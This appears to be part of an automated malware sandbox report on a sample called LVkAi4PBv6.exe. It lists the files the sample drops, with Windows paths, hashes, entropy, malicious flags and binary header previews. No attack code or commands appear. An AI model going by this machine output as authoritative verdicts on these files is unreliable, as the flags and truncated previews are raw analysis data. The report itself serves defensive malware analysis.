                                                                                                                                                                                                                                                                                                SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\PatchReaderWCF\sqlite.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):249232
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.822042592978165
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:hiDoxpdJLEfunorfdoU9nxGIndwR7j0E3/AE6u6J:QDApalrGIdwR7jZ3/B6/J
                                                                                                                                                                                                                                                                                                MD5:596439B3A9F9EA44FF28E2974F69AB07
                                                                                                                                                                                                                                                                                                SHA1:A2074CD3D39045902F82A072455420AB7101A036
                                                                                                                                                                                                                                                                                                SHA-256:8CC91D57D45B46B3439EAA017BF1DEB8E177F15245BA6F18EBCF2BD0A173A4F3
                                                                                                                                                                                                                                                                                                SHA-512:1DE8D41FEC0844999B88C0CB738AAC71C0AE895A51E91F6465AFAA864537E692E4576E6699B4976E62AA2C38EF9125D9AAF09A72ACAA068A0C2B05D413AF858A
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..2...a...a...a..ua...a..sa...a..ba...a!..a...a...aQ..a..ea...a..ta...a..ra...a..wa...aRich...a........PE..L......L.........."!................l#.......0............................................@.............................5.......<...................................................................@...@............0..d............................text............................... ..`.rdata..Er...0...t..................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6305325
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9787714785946955
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:196608:DfUMP3JauYusFpUjU+Xm7KdVY4aKo7TNn5QjvA:r58jucejnmkVY4zoZ5Qs
                                                                                                                                                                                                                                                                                                MD5:9C540950F5A8981844FF33BFC55D2F36
                                                                                                                                                                                                                                                                                                SHA1:8C70F2BCB995CE313843CF7103C659C12EB263DC
                                                                                                                                                                                                                                                                                                SHA-256:DD53AC67D905DEFD4BD1F2B9B413DFC679E7C076E92792BE650C38659E1557C5
                                                                                                                                                                                                                                                                                                SHA-512:7D87E02B60647134758F4C20BDB18A1DEF78BC9B69D337B6EE6D9B190968749D028479D0F6758CDFD8C76DF454F7AE68395A4EBDCB6D99CEA5B0B48CD5BA685B
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z..........................................@.......................................@..................................................................`...=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc...............................@..@.reloc...=...`...>..."..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AXE8SharedExpat.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):168960
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.635989544957891
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:mm3ITKGHS4tcdKwmcOTw1hOqLKpJzadzwxxYBcdgNqbeBTg4vRPzr4zvRjN:mVTxS4tcdKVw1iB8AxrGqG4J
                                                                                                                                                                                                                                                                                                MD5:77610CBDCAC173785E2FB18CCB522574
                                                                                                                                                                                                                                                                                                SHA1:315E7DE9D5DA5C13364D6A5E90C7EFF80A15DA48
                                                                                                                                                                                                                                                                                                SHA-256:40CE54280DBA1A8F029F4A8AFDD19F5D898CE4A221104ED6F9B0F619D54F912F
                                                                                                                                                                                                                                                                                                SHA-512:AA81C82F122D75B3DCA6993A69C051779F9E63E1006E1B3AAB3C6E1A82AF66BBB100CF091A160049C6B041E53ADA6AF71033FC23ED1EA8888F9F3C161FA11206
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........r..P.n.P.n.P.n.Yk..D.n.w...S.n.P.o...n.Yk.w.n.Yk...n.Yk..Q.n.NA..Q.n.Yk..Q.n.RichP.n.........PE..L....;.L...........!.................W..............................................1&....@..........................h......Lc..(...................................................................`X..@............................................text...$........................... ..`.rdata..bi.......j..................@..@.data...X#...p.......P..............@....rsrc................f..............@..@.reloc...$.......&...n..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1219488
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.312582930861741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24576:+heavSigvk0vhkzswHD4/V3OQdnYKYc4wXUyuy1:qP710vezrj4dJYFYUyuy1
                                                                                                                                                                                                                                                                                                MD5:F778E9136AB0DB9DE9802A7043DE50A7
                                                                                                                                                                                                                                                                                                SHA1:850DCA074534A14FDB9ADA6AFACEEA88558764E0
                                                                                                                                                                                                                                                                                                SHA-256:90803A583E9F693DE5E7B8A196832436F6F648B27FB82E55904C256F30CC8B3A
                                                                                                                                                                                                                                                                                                SHA-512:CD6C5C3537F05AD5826D503E38B8E6EF2EAF668616BEC15BA51AD3D81E0337A72779D7CA6AF9E8EBEE12D713891B30C0B73BF34718552BC9F4E7D8909B998156
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................%.l....o...D.....y....p...D.....i.......D.....~......n....k...Rich....................PE..L....oEM.........."..................z............@......................................@.................................T...|.......h.......................d................................... +..@............................................text............................... ..`.rdata..............................@..@.data...........v..................@....rsrc...h............V..............@..@.reloc..:............p..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\BIB.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):110472
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.411600464209584
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:FeQixAO/A/0VSaGHvP5GeBTEpP2t31VrxrcZ0KOKbfQp:uKO+0VSnKOKbop
                                                                                                                                                                                                                                                                                                MD5:759D71FC9442AB5A9B5749C0F6C0C263
                                                                                                                                                                                                                                                                                                SHA1:07A68C6922D443EB9D6D445DA18AE8A6D92F7AC6
                                                                                                                                                                                                                                                                                                SHA-256:109647F58E7E8386A4C025F2C8175A4D638E5C0E62768953390764010EA22A2E
                                                                                                                                                                                                                                                                                                SHA-512:E3EFE66C76EA81285BA01B1978FDB3E807EB0BF2CFE0373BB6FEF06F2FD7D9DDC3269ACF0D87517CBF9BEA5FA09B2703A03792491DC8265D26B724D7DCA106C7
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............T..T..T..rT..TO.wT..T..tT..T..bT...T._.T..T..T...T..eT..T..sT..T..uT..T..pT..TRich..T................PE..L......L...........!.................j..............................................K.....@.............................j....{..<...................................................................(/..@............................................text............................... ..`.rdata..Js.......t..................@..@.data...,............j..............@....rsrc................t..............@..@.reloc...............|..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\BootstrapperApplicationData.xml

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (473), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2006
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7572989677816073
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:y+03qHhhO7YDTT3ne1REDHV5JC0wNqycUbTXRC+bLqihGrWrol:Xn7n6q80wMycsRCDKGrN
                                                                                                                                                                                                                                                                                                MD5:ADBA259B1418C9ED84277688BFEEFAA7
                                                                                                                                                                                                                                                                                                SHA1:A6EF522036403047FF578DEF1E0AFD616A277357
                                                                                                                                                                                                                                                                                                SHA-256:6DF90329C4E3DF98DBB91556C98CDB46CD0258B49A500999284096A9DF972BDA
                                                                                                                                                                                                                                                                                                SHA-512:9F90BD3C1892CE45870DE3FEC0F83516E5B61C1774024C03EC2BCDAEB7C8AC1F05536BF0403C77F520D8D39C0ACBE11769A32A3FE49571B71F1D4DCC5FCFFE66
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".S.c.a.b.b.a.r.d.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.5.c.6.7.9.b.6.d.-.9.8.d.4.-.4.b.7.8.-.9.6.0.a.-.1.8.2.1.c.9.2.2.7.4.d.b.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.6.C.D.E.7.8.E.C.-.4.C.1.C.-.4.6.A.B.-.B.B.E.9.-.9.7.4.6.B.E.0.D.7.F.8.6.}.". .P.e.r.M.a.c.h.i.n.e.=.".n.o.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".S.l.u.i.t.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".P.y.t.h.o.n. .3...1.2...5. .E.x.e.c.u.t.a.b.l.e.s. .(.6.4.-.b.i.t.).". .D.o.w.n.l.o.a.d.S.i.z.e.=.".7.4.1.3.7.6.". .P.a.c.k.a.g.e.S.i.z.e.=.".7.4.1.3.7.6.".

                                                                                                                                                                                                                                                                                                C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\Quadruple.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):255392
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.5751135995470245
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:z7qdWWmoR0sztnfGIUbmUL1ueM+d9euhAOZD3FCP3z:Sssztnfu9ueM+doKX4P3z
                                                                                                                                                                                                                                                                                                MD5:7C95B91566BA5A2D8BF70C2BCF13D712
                                                                                                                                                                                                                                                                                                SHA1:B01F54AE2964480B8AEB2817285219AB8A2C79C0
                                                                                                                                                                                                                                                                                                SHA-256:39230D24CF7602FF2B00A7FF13BA5160B9B3446FBA7C6F6295DD4FB2EB408DF5
                                                                                                                                                                                                                                                                                                SHA-512:AB70A77C05EC42B77166D2E7FC81B18AD390E2CB32249F35355AFD4271AEDCFBDE882992AE0E84A9F95453CB9FD05AE224713EE3FDA93BABC6C9CFB572B50FAD
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........b.o.1.o.1.o.1...0.o.1...0.o.1...0.o.1...0.o.1...0.o.1...0.o.1...0.o.1.o.1.o.1...0.o.1...0.o.1..W1.o.1.o?1.o.1...0.o.1Rich.o.1................PE..L...C.3`.........."!.........R......................................................~.....@......................... .......,...x.......p........................(...`..p...................@a......p...@...................<...@....................text............................... ..`.rdata..N...........................@..@.data...............................@....rsrc...p...........................@..@.reloc...(.......*..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\choirgirl.pdf

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):62969
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.539146899101455
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:wtVMpSzCLmJZriRxBfJJXWT/5F0Oy+loZ:wvuSJhEHfJJGT/5F0v+SZ
                                                                                                                                                                                                                                                                                                MD5:9076AB572C60AAB6B113F4F9108A9CC8
                                                                                                                                                                                                                                                                                                SHA1:1439248640CE9418B5BA13862160DFA00364390B
                                                                                                                                                                                                                                                                                                SHA-256:1E5750FFBDC77FCE17521A2EF5754A998B002A87E9036B1157FC2A63DD91C30D
                                                                                                                                                                                                                                                                                                SHA-512:B42B6162930A5CB9B0FEBC5CE1C6FD5EEF7B02AD041C302820541968EE5FFF1B779D60BDC458B5539B9AEF2F9169F493392A8CD819F435F10D71941A55761287
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:t..T...N.mJ..L..x...o.sF.y.w.SOZD.....giq.[.hU\g\Aa[i..VOBib...[.Lok.G.oRgl.l..SLcn.L...D.o..tO...Z.m.[]......Bo`]FL.[....MV..d.n^.W..j.X.._.n.\.U..crq..`YJRSTd.s\T.R...p....M..kS[.....I.c..pV.v..b.^.q`........M.tpY..b.j.R.i..x..gtO.n.p..Q.\..ug...aR.v[.Gg^.jWa..lhX.QL.fB....Qu.gZ.EK.....Wl.gi.ndP....E\.UHo.O..E..u...i...LF.iqMdJ.W...xgVjkqT..RWu.B].q...W.P.D..V.L..^\ecT...[Vv..F..pp.Ae...q.Ge.f[Msm.J.S.[S.dDGmp\J.vKB....NA.Eiqfu\B.P.M\.Pdo.......Pg..k.wdf...l.e....QG^.E.P......EAB..g.X.s...Y...VbZWe..`.g.......C..Lp.J..r...K.^.fS...k..Y`V.r...O.p.TY.X.R..C...hhR.wqPA..o_hMR..m...nIwiHqCfYq^.dhD...]^.\A.iW.j..dk.cn...]P\ag..cU..xxuAdS].t....S.wU.T.SA.l.yt...N.Q..b...`tyraG.....Za...cC.\n.xa.A..qw.A.K...Yk...p.E....bo.S..Z..ag[fB.L.t..G..w..jw.N.WN.....Q[T.q.rbQZg.Zxg..g..YplESQZQ^wo..d.u._..g._LqVlKcXSS..aOr.`r...f.is..pa...W..s.lVL..b.......ZOSCyu.m..b.rJ..n..u.tr..aB...x[o..Rp..mX.hRIr...R..G..n.V_.S.D.......jsqks.Nh.bRy.Z..f.Nld.`.HU.......G\_.MR..\...y..nJEd.dhh...SIXA..G..J^..xWej

                                                                                                                                                                                                                                                                                                C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\intermixture.zip

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4526833
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.959653744732072
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:98304:9M79mFIVQgIBckuHqM4KVqnl8dAQiORny+fRt:91MQgIBcksVqKdALO9t
                                                                                                                                                                                                                                                                                                MD5:3085505DB1512B966530B829E136BDCF
                                                                                                                                                                                                                                                                                                SHA1:C105A4CB691CC2302878C71BE8D375E4018CDB29
                                                                                                                                                                                                                                                                                                SHA-256:2B85E3A5C3DA072A33AB1372B102EDD4AF6D02D8B74A3E5C949B3F9E628521B7
                                                                                                                                                                                                                                                                                                SHA-512:5A1FD3C4A534C00246C2A7CB9B92775E70FFB02653B2E2F442852466B5558D7B5D88168284F4EA20E528523B2ADD9907EF37077F20DB79EB27285E045CF13A72
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:luC.G..eR.SU..d...\\.m.ZMH....pj]gI..tj.xf.AFD.Xr.tH...J..g.wL.W.myBY..et.\ADg.........JXNvi.`l`.]FD.I..G.d.[...O.UF.p..[.w._..H.bq.Ix...lw].fW...iUri.A.vg.gTZD..f..H.NYcJ`pH.vJi..Pi..i........mwomuu.E.....tjS...FpI..E.Ua..SFl].F.\.^IU....gL]....b..iM`.....O.A.c.K......xt..jwC.`N..Da....mt].C]GA.jL.H.J.....\E..YNg...LK.q....rhg..Wi..MwF..ikT..J...F.h.w..p.GKrDOo...g..uUPU.Zp.]......P.Z.v..fUhmS..WL..o.xC..d.C.YynN.`.XyUHG.`...]eL.m...Z.^.....D..sF..SY.K\..Yn...t.q.W...Yik.v...Fwp...iQ.s..IM.t......Ch..U..JO.V...xtv.b.M.I......uW....K[.i....SK..i.....E.NvaqC........Fe..u.G...dd.T..rf....JLw......W[.H.K.T..\g.oi.....R.La.X..G.o.CBF..ApN..].J.Vk.[.AJ.m....P..h[Vr..Q^h...Ynx...R..Z.j.yo..HZE.....M..F...c....tJ..WK.C....S.S.nF.j.....FJ.G...[q^.M..vMM.....b.Ei.G...o.HW..LD].....thM....J`Kt.L.oL.m.cFn.j.i._..fsR...X.....l.....J.McHim^.x...I.Y.lT.`B....M.].i..Hv.IJv.s.....psL..Y.TY.EN`..ol.^..sl..V......vG...Y...Ni.SOaDCS....v..R.GxE....TtoQ.b...R.YWrXpp..`R^.od.w..i..kt.y...H.xd..Wy.W.w.AO.Vj

                                                                                                                                                                                                                                                                                                C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcp90.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):570496
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.5259314477231305
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:BpFE340h3e34GVZQACkIPYhUgiW6QR7t5183Ooc8SHkC2eLgAfO:Bph0h3e3vgzPA83Ooc8SHkC2eLgAfO
                                                                                                                                                                                                                                                                                                MD5:90A32D8E07F7FB3D102EAB1DA28F0723
                                                                                                                                                                                                                                                                                                SHA1:0903911BBB5D00F68BA51895FA898B38A5453DED
                                                                                                                                                                                                                                                                                                SHA-256:004ED24507DC7307CEC1A3732FA57EABF19E918C3E1B54561E6CC01F554C0B77
                                                                                                                                                                                                                                                                                                SHA-512:2C69586D5C5D2B4B5DECF2BF479554C3D0FF5F5A6FBACB01B8583EA8D96D0AE9C850C30A0D43EB2AD1116BE901578D15FE08FCE3E505440C854082C208A79F1A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#%..Mv..Mv..Mv.66v..Mv...v..Mv..Lv:.Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..MvRich..Mv........................PE..L.....i[...........!.....4...p..............P....Hx......................................@..........................P..,....E..<...............................D3...................................%..@............................................text....2.......4.................. ..`.data...t'...P.......8..............@....rsrc................R..............@..@.reloc..HC.......D...V..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):653952
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.885961951552677
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
                                                                                                                                                                                                                                                                                                MD5:11D49148A302DE4104DED6A92B78B0ED
                                                                                                                                                                                                                                                                                                SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
                                                                                                                                                                                                                                                                                                SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
                                                                                                                                                                                                                                                                                                SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\sqlite.dll

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):249232
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.822042592978165
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:hiDoxpdJLEfunorfdoU9nxGIndwR7j0E3/AE6u6J:QDApalrGIdwR7jZ3/B6/J
                                                                                                                                                                                                                                                                                                MD5:596439B3A9F9EA44FF28E2974F69AB07
                                                                                                                                                                                                                                                                                                SHA1:A2074CD3D39045902F82A072455420AB7101A036
                                                                                                                                                                                                                                                                                                SHA-256:8CC91D57D45B46B3439EAA017BF1DEB8E177F15245BA6F18EBCF2BD0A173A4F3
                                                                                                                                                                                                                                                                                                SHA-512:1DE8D41FEC0844999B88C0CB738AAC71C0AE895A51E91F6465AFAA864537E692E4576E6699B4976E62AA2C38EF9125D9AAF09A72ACAA068A0C2B05D413AF858A
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..2...a...a...a..ua...a..sa...a..ba...a!..a...a...aQ..a..ea...a..ta...a..ra...a..wa...aRich...a........PE..L......L.........."!................l#.......0............................................@.............................5.......<...................................................................@...@............0..d............................text............................... ..`.rdata..Er...0...t..................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.982301715397725
                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                File name:LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File size:7'012'811 bytes
                                                                                                                                                                                                                                                                                                MD5:dc1a25a3cecfd804e569a7238ba1ec7f
                                                                                                                                                                                                                                                                                                SHA1:7bf13bcd7957fa71d6e0d70d2a0e0b578c040a62
